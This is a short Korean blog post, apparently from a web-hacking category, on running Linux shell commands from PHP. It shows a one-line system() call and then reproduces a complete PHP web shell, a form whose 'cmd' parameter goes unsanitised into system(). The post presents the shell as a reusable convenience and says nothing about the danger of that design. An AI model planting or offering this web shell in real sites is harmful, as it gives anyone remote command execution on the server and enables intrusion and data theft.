728x90
php에서 리눅스 언어 예를들어, ls나 cat같은 명령어를 사용하고 싶을 때가 있다.
이 때 php에서도 셸 스크립트 언어를 사용할 수 있는데 내가 알아본 방법은 두가지이다.
1. system 함수 사용
<?php
system("ls")
?>간단하게 system함수 안에 사용하고 싶은 셸 명령어를 따옴표로 묶어 입력하면 된다.
2. 웹 셸 코드 작성
아예 웹에다가 셸 명령어를 작성할 수 있는 입력칸을 만드는 것이다.
위의 1번 방법보단 복잡하지만 한번 만들기만 하면 계속 사용할 수 있는 용이성이 있다.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>출처 : https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985
easy-simple-php-webshell.php
GitHub Gist: instantly share code, notes, and snippets.
gist.github.com
이런식으로 사용이 가능하다.
728x90
반응형
'Web Hacking > Information' 카테고리의 다른 글
| 칼리 리눅스를 활용한 실전 모의해킹 (0) | 2023.11.20 |
|---|---|
| SQL INJECTION 예방책 - prepared statement (0) | 2023.10.28 |
| sql injection 주석 사용 주의점 (0) | 2023.10.20 |
| bit연산 이용한 Blind sql injection 기술 (0) | 2023.10.16 |
| SQL Injection 공격 방법 (논리 연산자 & 주석) (0) | 2023.09.17 |
